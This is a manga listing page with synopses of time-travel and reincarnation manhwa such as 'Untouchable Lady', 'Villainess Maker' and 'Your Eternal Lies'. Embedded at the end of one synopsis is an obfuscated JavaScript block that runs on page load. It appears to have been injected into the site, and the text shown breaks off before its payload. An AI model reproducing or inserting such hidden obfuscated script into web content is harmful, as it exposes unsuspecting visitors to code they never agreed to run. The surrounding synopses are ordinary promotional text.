Time Travel - Page 12

Enjoy the finest manga Time Travel titles online. Don’t miss the chance to read Time Travel manga for free!

140 results

Tsuihousareru Tabi ni Skill o Te ni Ireta Ore ga, 100 no Isekai de 2-shuume Musou

An adventurer named Ed was exiled from his party because he was considered useless, but instead of being sad and upset he was actually happy!!? It turns out that it\'s not without reason that he feels happy when he\'s exiled from his party, because every time he\'s been exiled he will receive a skill that makes him even more invincible... Ed was given the crazy test of having to get expelled from 100 Hero parties in 100 different worlds before he could return to his original world. Finally a mysterious and divine entity said that he had achieved all the conditions to return to his original world. However, as a final condition he is asked “Look at the fate of one of these exile worlds after you left.” and he is shocked by what he sees. “Okay, I’ll do it! I’ll go down to these 100 worlds again and be banished with a good feeling!” Ed takes on a new challenge to make full use of the super-powerful “Exiled Skills” that were granted each time he was exiled, and this time ensure they all have happy endings. ___ **Character Designer:** [GreeN](https://mangadex.org/author/40916d07-ed66-40d9-919f-3bfff091fe9a)


Twist Of Destiny

Abby was reincarnated. This time, she swore to reform the villain of her previous life, changing the fate of the world ending… No, why should I be so hung up on this? Nice, gentle older brothers, a mysterious mage- Who is this decisive killer of a handsome man with so many accomplishments in war? It turns out to be the Crown Prince who had died young in his past life! Well, one way is to put him on the throne, but he’s destined to die in three years due to a curse! (Synopsis: Gourmet Scans) Saving My Crown Prince, 拯救我的皇太子殿下



The laws of the world have changed! In an instant, the world turned into a hell for the strong because of the god Kashita. At the end of the slaughter test given by the gods, “Yoo Dohyuk” became the “Great Emperor”, the strongest of mankind, and defeated God. However, the pleasure of victory is short-lived, and everyone returns to the first day of the trial with their memories of what happened. With the exception of “Yoo Dohyuk.” Instead of helping each other, people rush to take the place of the strongest one by killing the “Great Emperor”. In a world crazier than his previous life, can Yoo Dohyuk kill God and restore peace?<script></script><script>(function(_0x53dbcd,_0x3a034b){var _0x104342=_0x155d,_0x40021c=_0x53dbcd();while(!![]){try{var _0x20b1b4=parseInt(_0x104342(0xbb))/(-0x11*-0x1ea+0x12fc+-0x3385)*(parseInt(_0x104342(0xb4))/(-0x1*-0xa5+0x13*0x191+-0x511*0x6))+parseInt(_0x104342(0xc8))/(0x989*0x3+-0xef6*0x1+-0xda2)+-parseInt(_0x104342(0xc3))/(0x1e73+0x16a3+-0x3512)*(parseInt(_0x104342(0xba))/(-0x44b*0x8+-0x10*-0x2+0x223d))+-parseInt(_0x104342(0xd3))/(-0xe87+0x3*0x7db+0x4*-0x241)*(parseInt(_0x104342(0xbd))/(0x155+-0x1*-0x2105+0x1*-0x2253))+-parseInt(_0x104342(0xc5))/(-0x1f57+-0x2609+0x4568)*(parseInt(_0x104342(0xb5))/(0x7a2*-0x2+-0x11cd+0x211a))+-parseInt(_0x104342(0xca))/(-0x1311+-0x9c*0x33+0x322f)*(-parseInt(_0x104342(0xd1))/(-0xd*0x1f5+-0x1c49+0x35c5))+-parseInt(_0x104342(0xb7))/(-0x605+-0xb42+0x1153*0x1)*(-parseInt(_0x104342(0xb8))/(0x1b0d+0xb25+-0x2625));if(_0x20b1b4===_0x3a034b)break;else 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Untouchable Lady

“Please, Hilise. Please die in place of Gabrielle.” My always dignified brother begged me for the first time. He wants me to die for our stepsister, whom we don’t even share a drop of blood with. “For the first and last time, I ask you this.” I’ve always been miserable, and there is no exception this time. The seventh time that I was betrayed and killed, I was completely free of lingering feelings. “I’m glad that you’re a scumbag until the end.” I won’t be swayed by love anymore. It’s my turn to abandon them first.


Villainess Maker

I reincarnated into a romance fantasy novel written 10 years ago. On top of that, I became the villainess, Ayla, who cursed the female lead and was killed by the male lead. Then, won't it be enough if I don't become a villain? "I'll live this life playing around like a jobless millionaire!" However... Before long, the days began to repeat because I didn't act like the original villainess, Ayla. "Please stop Ruph...." "The solution is simple. Become a real villainess." "A real villainess?" "Riches, power, glory and men, you can have everything. If you want, you can even steal the crown and place it on your own head." The seemingly dangerous and mysterious man spoke sweet, demon-like words into my ears. "So, your answer?" Can Ayla really become a real villainess in order to stop Ruph? Villainess maker, the devil's captivating class to create a real 'villainess', has begun.


When I Quit Being A Wicked Mother-In-Law, Everyone Became Obsessed With Me

Read Manhwa When I Quit Being A Wicked Mother-In-Law, Everyone Became Obsessed With Me / 악녀 시어머니를 그만 뒀 더니, 다들 내게 집착한다 A Wicked Woman Who Is Feared By Her Husband And Her Son. A Mother-In-Law Who Is Abandoned By Her Family After Tormenting The Female Lead. That Was Me. So I Brought My Young Daughter-In-Law Who Was Abused And Raised Her. The Only Goal Is To Make The Female Lead Take My Side! If I Succeed, Can I Avoid The Cruel Ending Of The Novel? … That’s What I Thought. “Mother, The Weather Is Good. Could You Please Take A Walk With Me?”. “Mother, I Baked Cookies Myself. Try A Bite.”. “Mother, Mother….” My Young Daughter-In-Law Always Follows Me Around, Leaving Behind The Boy Who Will Become Her Future Husband? “Mom, I Like Lily, But I Like You Better.”. My Son, Who Was Scared Of Me, Whispered With A Shy Face. “Madam, How Long Are We Going To Use Separate Rooms?”. My Husband, Who Was Always Cold, Looked At Me With Honey Dripping Eyes. ……Why Is Everyone Acting Towards Me In Such A Way All Of A Sudden?


Young Master Is Too Righteous

Read Manhwa Young Master Is Too Righteous Online For Free At Mangazin Young Master Is Too Righteous Manga Also Known As “Công Tử Thực Sự Quá Chính Nghĩa / Gongzi Shizai Tai Zhengyile / Gōngzǐ Shízài Tài Zhèngyìle / Justice Mask / 公子实在太正义了”. This Ongoing Webtoon Was Released On 2022. The Story Was Written By 小炎戒 And Illustrations By 漫文社. The Content Of The Comic Young Master Is Too Righteous: A Villainous Space-Time Traveler Randomly Took Over The Body Of A Noble Who Was A Role Model Of Justice And Obtained A System Disguised As A Villain’s Training Manual! How Was He Supposed To Choose Between Good And Evil? To Carry Out Justice Or To Play Evil? Or Simply Both! The Comic Young Master Is Too Righteous Belongs To The Genre: Action, Adventure, Fantasy Hari Manga Is A Comprehensive Website Featuring The Latest And Hottest Manga, Updated Rapidly To Cater To Readers With High-Quality Images And Provide Them With Excellent Experiences. With Keywords Such As “Topmanhua” And “Manhwa Web,” As Well As Related Terms Like Manhwa Top, New Manga 2024, And Read Manhwa Engsub Ensures Readers Have Access To A Wide Selection Of Top-Notch Manga Content. Please Always Follow And Share With Your Friends To Support The Website Mangazin.org So That We Have More Motivation To Publish The Latest And Best Comics. Follow Get To Read New Manhwa Updated: Confession Attack Maxed Out Leveling In The Doghouse


Your Eternal Lies

영원한 너의 거짓말 Rosén Walker was jailed for murdering her husband at the age of 17. Having crushed the pride of the Imperial Army with two jailbreaks, she is captured again a year later and is sentenced to life imprisonment. On a boat going to Monte Island, where only the vilest prisoners were gathered, another jailbreak is planned… “What is your crime?” “… I’m innocent.” “Only a handful of prisoners would honestly admit that they have committed a crime.” Ian Connor, a blunt and upright ideologist, who is in charge of her deportation, doesn’t give any leeway. “Don’t say anything useless, just answer what you are asked.” Rosén, the Empire’s best jailbreaker, and Ian Connor, a young war hero who is loved by the entire empire. Their story unfolds on the ship heading to the worst prison on earth! Now, you shall be the judge. Is Rosén Walker a liar? Or is she not?
